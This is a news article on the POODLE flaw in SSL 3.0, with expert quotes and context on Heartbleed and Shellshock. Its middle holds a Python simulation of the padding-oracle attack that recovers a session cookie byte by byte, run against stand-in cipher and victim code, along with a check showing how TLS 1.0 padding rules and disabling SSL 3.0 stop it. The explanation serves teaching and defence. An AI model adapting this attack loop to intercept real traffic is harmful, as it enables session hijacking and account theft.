The world keeps getting less safe, it seems. In October 2014, Google security engineers disclosed a serious vulnerability, dubbed POODLE, in the web encryption standard SSL 3.0. The bug lets an attacker who can tamper with a browser’s traffic decrypt pieces of it, but the researchers say it is not as harmful as the Heartbleed or Shellshock bugs. What? You haven’t heard of either of them? Seriously? Do some homework then.
Google security engineers Bodo Möller, Krzysztof Kotowicz and Thai Duong wrote in their report that POODLE is a new security hole in Secure Sockets Layer (SSL) 3.0 that makes the nearly 18-year-old protocol impossible to use safely, and that getting rid of it will be hard because so many servers and browsers still support it. “POODLE” stands for Padding Oracle On Downgraded Legacy Encryption. Didn’t get it? Unpacked: a “padding oracle” is a server that reveals, by accepting or rejecting a tampered encrypted record, whether the padding at the end of that record decrypted correctly, which leaks the plaintext one byte at a time; “downgraded” is the trick of forcing a browser that supports modern TLS to fall back to legacy SSL 3.0 so that the oracle can be used at all.
Security experts said the bug could let attackers steal browser “cookies”, but relax, it is not that serious. Ivan Ristic, director of application security research at Qualys and an expert in SSL, said: “It’s quite complicated. It requires the attacker to have a privileged position in the network.”
Jeff Moss, founder of the Def Con hacking conference and an adviser to the U.S. Department of Homeland Security, said attackers could exploit the bug to steal session cookies from browsers and so take over accounts on social networks, email providers and banks that still use the technology. To do so, though, they would need to mount a “man-in-the-middle” attack, sitting between the victim and the server so they can intercept and modify the traffic. A common way to get into that position, he added, is to set up a rogue WiFi “hot spot” in an Internet cafe.
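To make the mechanism Ristic and Moss are describing concrete, here is a self-contained simulation of the attack. It is an added example, not code from the article or from Google’s report. It stands in for the real cipher suite with constructed pieces: a 4-round Feistel network keyed with SHA-256 as the block cipher, HMAC-SHA1 as the record MAC, a random per-record IV in place of SSL 3.0’s chained IV, and a victim browser that the attacker can coax into sending requests of chosen path and body length (the role attacker JavaScript plays in the real attack). The attacker is assumed to know where the cookie sits in the request and how long it is. The attacker loop is the general one-byte-per-roughly-256-requests procedure rather than a single-byte demo, and a `check_filler` switch shows why the TLS 1.0 padding rule closes this particular oracle.

```python
# Added example (not from the article): POODLE simulation with constructed stand-ins.
import hashlib
import hmac
import os

BLOCK = 16     # cipher block size in bytes
MAC_LEN = 20   # HMAC-SHA1 tag length

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Constructed stand-in block cipher: a 4-round Feistel network whose round
# function is SHA-256. Any CBC block cipher would do; POODLE is cipher-agnostic.
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def ssl3_seal(enc_key, mac_key, data):
    """MAC-then-encrypt, SSL 3.0 layout: data || MAC || filler || pad_len."""
    body = data + hmac.new(mac_key, data, hashlib.sha1).digest()
    pad_total = BLOCK - len(body) % BLOCK            # 1..16 bytes, length byte included
    padding = bytes([pad_total - 1]) * pad_total     # TLS-style filler is also valid SSL 3.0 padding
    iv = os.urandom(BLOCK)                           # SSL 3.0 really chains IVs; the attacker sees them either way
    return iv + cbc_encrypt(enc_key, iv, body + padding)

def ssl3_open(enc_key, mac_key, record, check_filler=False):
    """Return the data, or None on reject. SSL 3.0 only inspects the final length
    byte; check_filler=True adds the TLS 1.0+ rule that every padding byte must
    equal that length byte."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    pt = cbc_decrypt(enc_key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return None
    if check_filler and any(b != pad_len for b in pt[-1 - pad_len:]):
        return None
    body = pt[:len(pt) - 1 - pad_len]
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    expected = hmac.new(mac_key, data, hashlib.sha1).digest()
    return data if hmac.compare_digest(mac, expected) else None

# Constructed victim request; the attacker chooses path_pad and body_pad.
PREFIX, MIDDLE, SUFFIX = b"POST /", b" HTTP/1.1\r\nCookie: session=", b"\r\n\r\n"

def victim_request(cookie, path_pad, body_pad):
    return PREFIX + b"a" * path_pad + MIDDLE + cookie + SUFFIX + b"x" * body_pad

def poodle_recover_cookie(send, oracle, cookie_len, max_tries=20000):
    """send(path_pad, body_pad) -> sealed record from the victim;
    oracle(record) -> True if the server accepted it. About 256 records per byte."""
    head = len(PREFIX) + len(MIDDLE)
    recovered = bytearray()
    for k in range(cookie_len):
        # path_pad puts cookie byte k in the last position of plaintext block i
        path_pad = (BLOCK - 1 - (head + k) % BLOCK) % BLOCK
        i = (head + path_pad + k) // BLOCK
        # body_pad makes data+MAC block-aligned, so the final block is all padding
        body_pad = -(head + path_pad + cookie_len + len(SUFFIX) + MAC_LEN) % BLOCK
        for _ in range(max_tries):
            record = send(path_pad, body_pad)
            blocks = [record[j:j + BLOCK] for j in range(0, len(record), BLOCK)]  # blocks[0] is the IV
            # man-in-the-middle step: overwrite the all-padding last block with C_i
            tampered = b"".join(blocks[:-1]) + blocks[i + 1]
            if oracle(tampered):
                # accepted, so the last decrypted byte was BLOCK-1:
                # P_i[15] ^ C_{i-1}[15] ^ C_{n-2}[15] == 15, and both C's are visible
                recovered.append((BLOCK - 1) ^ blocks[i][-1] ^ blocks[-2][-1])
                break
        else:
            return None   # the oracle never fired: this server is not leaking
    return bytes(recovered)

def demo(cookie=b"S3cr3tC0", strict=False, max_tries=20000):
    enc_key, mac_key = os.urandom(16), os.urandom(16)   # shared by browser and server, unknown to the attacker
    send = lambda p, q: ssl3_seal(enc_key, mac_key, victim_request(cookie, p, q))
    oracle = lambda rec: ssl3_open(enc_key, mac_key, rec, check_filler=strict) is not None
    return poodle_recover_cookie(send, oracle, len(cookie), max_tries)

if __name__ == "__main__":
    print("SSL 3.0 padding check, recovered cookie:", demo())
    print("TLS 1.0 padding check, recovered cookie:", demo(strict=True, max_tries=2000))
```

Running `demo()` recovers the whole cookie without the attacker ever learning the keys, which is the “privileged position in the network” Ristic refers to: the attacker only needs to see and rewrite the victim’s records and to watch whether the server accepts them. With `strict=True` the same loop never fires, because TLS 1.0 and later require every padding byte to equal the length byte, so a copied block passes the padding check with probability about 2^-128 instead of 1/256. That is why the fix is to stop negotiating SSL 3.0 at all (and, for clients that fall back, to send TLS_FALLBACK_SCSV so a downgrade is refused) rather than to patch any one implementation.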
Moss advised businesses and computer users to disable SSL 3.0 on their servers and in their browsers. “It’s not going to take out the infrastructure of the Internet. But it’s going to be a hassle to fix,” he said. Rumors that a new bug had been found in the OpenSSL software had been circulating on Twitter and technology news sites ahead of the disclosure; POODLE, however, is a flaw in the SSL 3.0 protocol itself, not in any one implementation of it. In April 2014, researchers discovered the “Heartbleed” bug in OpenSSL, which affected an estimated two thirds of all websites and thousands of other technology products. The bug dubbed “Shellshock” was uncovered in September 2014 in a piece of Unix software known as Bash.